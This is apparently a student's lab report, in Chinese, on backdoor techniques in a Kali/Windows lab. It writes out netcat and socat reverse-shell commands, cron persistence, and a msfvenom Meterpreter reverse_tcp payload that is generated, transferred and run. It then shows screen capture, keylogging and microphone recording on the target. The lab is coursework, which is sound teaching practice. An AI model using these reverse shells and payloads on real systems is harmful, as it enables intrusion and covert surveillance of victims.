博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
20145316许心远第二次实验《后门原理与实践》
阅读量:4594 次
发布时间:2019-06-09

本文共 1781 字,大约阅读时间需要 5 分钟。

20145316许心远第二次实验《后门原理与实践》

基础问题回答

1.例举你能想到的一个后门进入到你系统中的可能方式?

  • 从网络上下载来路不明的盗版软件、压缩包,还有一些小视频……

    2.例举你知道的后门如何启动起来(win及linux)的方式?

  • 双击打开。
  • 取得shell后远程直接执行后门这个可执行文件。

    3.Meterpreter有哪些给你映像深刻的功能?

  • 感觉它超级强大……每个功能都很让我印象深刻!开摄像头,看界面,录音频……完全没有任何隐私可言啊。

    4.如何发现自己有系统有没有被安装后门?

  • 如果翻看任务管理器时,机器内存占用非常严重,关掉主要应用程序还是有占用,任务里有并不认识的exe程序,那很有可能就是被安装了后门。

    实验总结与体会

  • 个人感觉这次实践比上次还有趣,尤其是后门被激活后,meterpreter的功能一经展示出来,简直被震惊。如果未开启防火墙,或防火墙不够高级,所谓监听、隐秘偷拍竟然是这么轻而易举的事情。
  • 实验过程总的不难,但也遇到了很气的部分。因为自己的疏忽忘记关防火墙(我以为自己关掉了),导致在win10系统内一直无法激活那个后门程序,后来换了xpattacker靶机也不可以,提示什么“不是win32文件”。总之,很纠结,浪费了两个小时,好在在武钰等同学的提醒和帮助下,找到了问题,攻克后,后面就比较简单了。
  • 因为我是win10系统,本身存在一定的坚固性,所以最后的提权暂时没做出来,准备之后自己再按个虚拟机或者借同学的win7系统完善一下。

    实践过程记录

    windows获得linux的shell

  • 为windows系统安装ncat软件,我安装在了C盘根目录下了。
  • ipconfigifconfig指令分别查看windows主机和kali虚拟机的ip地址。分别为kali:192.168.234.140 windows:172.30.0.152
    886492-20170316004808401-1469368899.png
    886492-20170316004815682-1162593952.png
  • windows下使用以下命令ncat.exe -l -p 5316监听
    kali下使用nc 172.30.0.152 5316 -e /bin/sh反弹连接windows
    886492-20170316004834838-1928601877.png
    886492-20170316004841198-1291340272.png
  • windows获得linux的shell

    886492-20170316004858057-314066466.png

    linux获得windows的shell

  • linux主机使用nc -l -p 5316命令于5316端口进行监听
    886492-20170316004909041-2050313571.png
  • windows主机使用ncat.exe -e cmd.exe 192.168.234.140 5316命令通过5316端口反弹连接linux主机
    886492-20170316004919026-679282727.png
  • linux获得windows的shell

    886492-20170316004929932-1979930893.png

    启动cron

  • 在linux终端下使用crontab -e命令修改用户的cron配置,弹出一个vi界面
    886492-20170316004941838-1609756340.png
  • 修改部分如下
    886492-20170316004954479-1415394738.png
  • cron启动成功

    886492-20170316005038463-2130230402.png

    windows利用socat获取kali的shell

  • kali上用socat tcp-listen:5316把cmd绑定到端口5208
  • 同時用socat tcp-l:5316 system:bash,pty,stderr反弹连接
    886492-20170316005143526-1724323919.png
  • windows使用socat readline tcp:192.168.234.140:5316开启监听
    886492-20170316005207463-1386267046.png
  • 成功,用ls检验

    meterpreter获取主机shell

  • linux使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.234.140 LPORT=5316 -f exe >20145316.exe来生成后门程序,然后发送到windows机中。
    886492-20170316005255088-913054258.png
  • windows输入指令ncat.exe -lv 5316 >20145316.exe
    886492-20170316005311573-879367165.png
  • linux使用命令ncat -nv 172.30.0.152 5316 < 20145316.exe传送后门程序
    886492-20170316005325620-456514312.png
  • 在windows主机ncat文件夹下查看是否有后门文件植入
    886492-20170316005340854-1751830420.png
  • 使用msfconsole命令开启msf进行设置
    886492-20170316005354010-1622139353.png
  • 监听开始,在windows双击20145316.exe运行后门程序,实现远程控制

    886492-20170316005436620-1775907288.png
    886492-20170316005506104-889482669.png

    meterpreter实现特殊功能

  • 查看主机文件夹信息
    886492-20170316005515370-422092423.png
  • 获取靶机屏幕截屏
    886492-20170316005534448-193726476.png
    886492-20170316005540166-1722142792.jpg
  • 记录靶机击键记录
    886492-20170316005555776-604005553.png
  • 调用靶机麦克风,录制音频文件
    886492-20170316005610291-799876129.png
  • windows上任务管理器可以看到后门正在运行

    886492-20170316005901791-222909655.png

转载于:https://www.cnblogs.com/xxy745214935/p/6557608.html

你可能感兴趣的文章
Memcache 统计分析!
查看>>
(Python第四天)字符串
查看>>
个人介绍
查看>>
使用python动态特性时,让pycharm自动补全
查看>>
关于R软件的安装
查看>>
MySQL数据库免安装版配置
查看>>
你必知必会的SQL面试题
查看>>
html5 Canvas绘制时钟以及绘制运动的圆
查看>>
Unity3D热更新之LuaFramework篇[05]--Lua脚本调用c#以及如何在Lua中使用Dotween
查看>>
JavaScript空判断
查看>>
洛谷 P1439 【模板】最长公共子序列(DP,LIS?)
查看>>
python timeit
查看>>
Wireless Network 并查集
查看>>
51nod 1019 逆序数
查看>>
Java_Set用法总结
查看>>
Codeforces Round #160 (Div. 2) D. Maxim and Restaurant(DP)
查看>>
Exchange Port
查看>>
oracle 01578
查看>>
在source中查看代码
查看>>
pip install xxx -i https://pypi.tuna.tsinghua.edu.cn/simple
查看>>